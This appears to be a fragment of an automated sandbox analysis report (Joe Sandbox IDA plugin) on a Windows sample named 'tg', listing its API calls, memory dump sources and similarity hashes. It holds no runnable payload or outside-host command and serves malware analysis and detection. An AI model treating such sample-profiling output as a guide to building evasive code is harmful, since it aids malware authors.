                                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcmemset
                                      • String ID: RtlGetVersion$ntdll.dll
                                      • API String ID: 3137504439-1489217083
                                      • Opcode ID: 6332086022332b991d2c4cf9c539ad8fbd8ac088d8322b57d3057784f2e87649
                                      • Instruction ID: 30d66d9a54b09ec8b40df40bafdfba1d8cbaec4fc0a5d0b23e6a41b72964e000
                                      • Opcode Fuzzy Hash: 6332086022332b991d2c4cf9c539ad8fbd8ac088d8322b57d3057784f2e87649
                                      • Instruction Fuzzy Hash: FAE09A3176461176C6202B76AC09FCB2AACDF8AB01B14043AB105E21C5E63C8A018ABD
                                      APIs
                                      • wcslen.MSVCRT ref: 0040A0AB
                                      • HeapAlloc.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?,?,00403C62), ref: 0040A0C1
                                      • wcscpy.MSVCRT ref: 0040A0CC
                                      • memset.MSVCRT ref: 0040A0FA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AllocHeapmemsetwcscpywcslen
                                      • String ID: $0A
                                      • API String ID: 1807340688-513306843
                                      • Opcode ID: ddb17ac4584ae50943752de31405e04708b8483d2d19b8b99954ed05a6fee5b2
                                      • Instruction ID: f5e08f91bfd61cb5ee80f18050d08b7446549b79f9f251a776f81db7a0f8ced7
                                      • Opcode Fuzzy Hash: ddb17ac4584ae50943752de31405e04708b8483d2d19b8b99954ed05a6fee5b2
                                      • Instruction Fuzzy Hash: ED212431100B04AFC321AF259845B2BB7F9EF88314F14453FFA8562692DB39A8158B1A
                                      APIs
                                        • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409EFA
                                        • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F06
                                        • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409F1A
                                        • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,00000000,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F30
                                      • HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DFF
                                      • HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E25
                                      • HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E82
                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Heap$Free$Alloc
                                      • String ID: $0A
                                      • API String ID: 3901518246-513306843
                                      • Opcode ID: b46946705b204f9c30dffdadfffedc2aca485d526b87e64f112108196cd3b2d8
                                      • Instruction ID: e0ba865afb0c504cde721ebe6402ca52a8b9bc1920db32d4218675ac1f34fbd8
                                      • Opcode Fuzzy Hash: b46946705b204f9c30dffdadfffedc2aca485d526b87e64f112108196cd3b2d8
                                      • Instruction Fuzzy Hash: EC213971600616ABD320DF2ADC01B46BBE9BF88710F41852AB548A76A1DB71EC248BD8
                                      APIs
                                      • CreateThread.KERNEL32(00000000,00001000,?,?,00000000,008C8F58), ref: 004054AB
                                      • EnterCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
                                      • WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
                                      • CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0
                                        • Part of subcall function 0040DB32: HeapFree.KERNEL32(00000000,-00000008,0040D44B,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB6B
                                      • LeaveCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
                                      • String ID:
                                      • API String ID: 3708593966-0
                                      • Opcode ID: 90d5c19b946ffb749f21a3af15512962dae866b54bf80da6b69c9a1821aaad17
                                      • Instruction ID: 0c8983fff82f944e714e95dc609c427016460782395ad7ea9b381996daa8850a
                                      • Opcode Fuzzy Hash: 90d5c19b946ffb749f21a3af15512962dae866b54bf80da6b69c9a1821aaad17
                                      • Instruction Fuzzy Hash: 6E110632145604BFC3015F54EC05ED7BBB9EF45752721846BF800972A0EB75A8508F6D
                                      APIs
                                      • EnterCriticalSection.KERNEL32(00418624,00000200,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D95A
                                      • LeaveCriticalSection.KERNEL32(00418624,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D9AF
                                        • Part of subcall function 0040D946: HeapFree.KERNEL32(00000000,?,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004), ref: 0040D9A8
                                      • DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D9C8
                                      • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D9D7
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                      • String ID:
                                      • API String ID: 3171405041-0
                                      APIs
                                        • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                                        • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(008C0000,00000000,?,?), ref: 0040E2C7
                                      • GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                                      • wcscmp.MSVCRT ref: 004096C2
                                      • memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA
                                      Strings
                                      Similarity
                                      • API ID: AllocFileHeapModuleNameValuememmovewcscmp
                                      • String ID: \\?\
                                      • API String ID: 3734239354-4282027825
                                      APIs
                                      • memset.MSVCRT ref: 0040B2D7
                                      • memset.MSVCRT ref: 0040B2E0
                                      • memset.MSVCRT ref: 0040B2E9
                                      • memset.MSVCRT ref: 0040B2F6
                                      • memset.MSVCRT ref: 0040B302
                                        • Part of subcall function 0040C636: memcpy.MSVCRT(?,?,00000040,?,?,?,?,?,?,?,?,?,00000000,?,0040B275,?), ref: 0040C690
                                        • Part of subcall function 0040C636: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0040B275,?), ref: 0040C6DF
                                      Similarity
                                      • API ID: memset$memcpy
                                      • String ID:
                                      • API String ID: 368790112-0
                                      APIs
                                      Similarity
                                      • API ID: AllocHeapwcsncpy
                                      • String ID:
                                      • API String ID: 2304708654-0
                                      APIs
                                      • CharLowerW.USER32(00417032,?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 00406696
                                      • CharLowerW.USER32(00000000,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 004066D0
                                      • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 004066FF
                                      • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 00406705
                                      Similarity
                                      • API ID: CharLower
                                      • String ID:
                                      • API String ID: 1615517891-0
                                      APIs
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00412271
                                      • malloc.MSVCRT ref: 00412281
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041229B
                                      • malloc.MSVCRT ref: 004122B0
                                      Similarity
                                      • API ID: ByteCharMultiWidemalloc
                                      • String ID:
                                      • API String ID: 2735977093-0
                                      APIs
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D0B8,00000000), ref: 004121D4
                                      • malloc.MSVCRT ref: 004121E4
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 00412201
                                      • malloc.MSVCRT ref: 00412216
                                      Similarity
                                      • API ID: ByteCharMultiWidemalloc
                                      • String ID:
                                      • API String ID: 2735977093-0
                                      APIs
                                        • Part of subcall function 004053EA: EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 004053F5
                                        • Part of subcall function 004053EA: LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405428
                                      • TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405446
                                      • EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405452
                                      • CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405472
                                        • Part of subcall function 0040DB32: HeapFree.KERNEL32(00000000,-00000008,0040D44B,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB6B
                                      • LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405486
                                      Similarity
                                      • API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
                                      • String ID:
                                      • API String ID: 85618057-0
                                      APIs
                                        • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                        • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                        • Part of subcall function 00405EB0: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405F01
                                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(008C0000,00000000,?), ref: 0040DEF9
                                        • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(008C0000,00000000,?,?), ref: 0040DF1C
                                        • Part of subcall function 00402E9D: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402EC5
                                        • Part of subcall function 00402E9D: __fprintf_l.LIBCMT ref: 00402F1F
                                        • Part of subcall function 00409355: CoInitialize.OLE32(00000000), ref: 00409373
                                        • Part of subcall function 00409355: memset.MSVCRT ref: 00409381
                                        • Part of subcall function 00409355: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                                        • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                                        • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                                        • Part of subcall function 00409355: wcsncpy.MSVCRT ref: 004093DD
                                        • Part of subcall function 00409355: wcslen.MSVCRT ref: 004093F1
                                        • Part of subcall function 00409355: CoTaskMemFree.OLE32(?), ref: 0040947A
                                        • Part of subcall function 00409355: wcslen.MSVCRT ref: 00409481
                                        • Part of subcall function 00409355: FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                                        • Part of subcall function 00403CD7: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A61,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403D07
                                      • PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 004031CC
                                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                      • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,008C7CE0,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 00403231
                                        • Part of subcall function 00402CA9: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402D44
                                      Strings
                                      Similarity
                                      • API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorFreeHeapLastLibraryPathProc$CharInitializeLoadRemoveTaskUpper__fprintf_lmemsetwcsncpy
                                      • String ID: $pA
                                      • API String ID: 790731606-4007739358
                                      APIs
                                      • GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 004025A3
                                      • PathRemoveArgsW.SHLWAPI(?), ref: 004025D9
                                        • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(008C0000,00000000,?), ref: 0040DEF9
                                        • Part of subcall function 004098C0: SetEnvironmentVariableW.KERNELBASE(008C8F58,008C8F58,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9
                                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                        • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                                        • Part of subcall function 0040DF50: HeapFree.KERNEL32(008C0000,00000000,00000000,?,00000000,?,00411DE4,00000000,00000000,-00000008), ref: 0040DF68
                                      Strings
                                      Similarity
                                      • API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
                                      • String ID: *pA
                                      • API String ID: 1199808876-3833533140
                                      APIs
                                        • Part of subcall function 0040D2E8: TlsGetValue.KERNEL32(?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D2EF
                                        • Part of subcall function 0040D2E8: HeapAlloc.KERNEL32(00000008,?,?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D30A
                                        • Part of subcall function 0040D2E8: TlsSetValue.KERNEL32(00000000,?,?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D319
                                      • GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409870,00000000,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 00409754
                                      Strings
                                      Similarity
                                      • API ID: Value$AllocCommandHeapLine
                                      • String ID: $"
                                      • API String ID: 1339485270-3817095088
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _wcsicmpwcscmp
                                      • String ID: $0A
                                      • API String ID: 3419221977-513306843
                                      • Opcode ID: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                                      • Instruction ID: ce5e94a217663c04e8d70dd0a479d34a80eb67d33ce446282a7f9ad79867738e
                                      • Opcode Fuzzy Hash: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                                      • Instruction Fuzzy Hash: 2E11C476108B0A8FD3209F46D440923B3E9EF94364720843FD849A3791DB75FC218B6A
                                      APIs
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405722
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405746
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide
                                      • String ID: $0A
                                      • API String ID: 626452242-513306843
                                      • Opcode ID: 6ebf4601a22723825f5cb97cb36f297afbf3d96316567957ce430f2db9d3b6d5
                                      • Instruction ID: 257aa3cf1744ec2ccb71e28fb2e26357a5123011e6015fa77bf79efc500ed16d
                                      • Opcode Fuzzy Hash: 6ebf4601a22723825f5cb97cb36f297afbf3d96316567957ce430f2db9d3b6d5
                                      • Instruction Fuzzy Hash: 16F0393A3862213BE230215A6C0AF672A69CB86F71F2542327B24BF2D085B5680046AC
                                      APIs
                                      • EnterCriticalSection.KERNEL32(?,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?), ref: 0040D593
                                      • HeapAlloc.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?), ref: 0040D648
                                      • HeapAlloc.KERNEL32(00000000,-00000018,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000), ref: 0040D66B
                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?,?), ref: 0040D6C3
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AllocCriticalHeapSection$EnterLeave
                                      • String ID:
                                      • API String ID: 830345296-0
                                      • Opcode ID: 223ceb5fedc6bf78071f8d1d71221cc314eeccb9612ab2cf4b16bda0937aed7a
                                      • Instruction ID: 88038414d57a756cd7fad5c0050c74a6e8d04d69e7cdc083c9acd98434601a7e
                                      • Opcode Fuzzy Hash: 223ceb5fedc6bf78071f8d1d71221cc314eeccb9612ab2cf4b16bda0937aed7a
                                      • Instruction Fuzzy Hash: 9C51E370A00B069FC324CF69D980926B7F5FF587103148A3EE89A97B90D335F959CB94
                                      APIs
                                      • wcslen.MSVCRT ref: 0040E145
                                      • HeapAlloc.KERNEL32(008C0000,00000000,0000000A), ref: 0040E169
                                      • HeapReAlloc.KERNEL32(008C0000,00000000,00000000,0000000A), ref: 0040E18D
                                      • HeapFree.KERNEL32(008C0000,00000000,00000000,?,?,0040506F,?,0041702E,00401095,00000000), ref: 0040E1C4
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Heap$Alloc$Freewcslen
                                      • String ID:
                                      • API String ID: 2479713791-0
                                      • Opcode ID: 360229d15a1fb6af201326cedd8d5f72cb5848c1c9ec4e5b388a4d503be7f4ab
                                      • Instruction ID: 6002b1c3f5819bc59b30070f24097f674b8c445c60846b79d2129d941eb5fd7b
                                      • Opcode Fuzzy Hash: 360229d15a1fb6af201326cedd8d5f72cb5848c1c9ec4e5b388a4d503be7f4ab
                                      • Instruction Fuzzy Hash: BA21F774604209EFDB14CF94D884FAAB7BAEB48354F108569F9099F390D735EA81CF94
                                      APIs
                                      • EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D4A3
                                      • HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040D4E3
                                      • LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D51E
                                        • Part of subcall function 0040DB72: HeapAlloc.KERNEL32(00000008,00000000,0040D3EC,00418610,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB7E
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AllocCriticalHeapSection$EnterLeave
                                      • String ID:
                                      • API String ID: 830345296-0
                                      • Opcode ID: 762af24c506bf6e2b9559650e0095779b3b7acce71c4fd081469871384e8466f
                                      • Instruction ID: 44ceb6562d1eb3065d03cece85d0244f92a2e0345c3169311120ea74ede9abb0
                                      • Opcode Fuzzy Hash: 762af24c506bf6e2b9559650e0095779b3b7acce71c4fd081469871384e8466f
                                      • Instruction Fuzzy Hash: 0A113D72604600AFC3208FA8DC40E56B7F9FB48325B14892EE896E36A1C734F804CF65
                                      APIs
                                      • EnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D6EF
                                      • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF), ref: 0040D706
                                      • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF), ref: 0040D722
                                      • LeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D73F
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
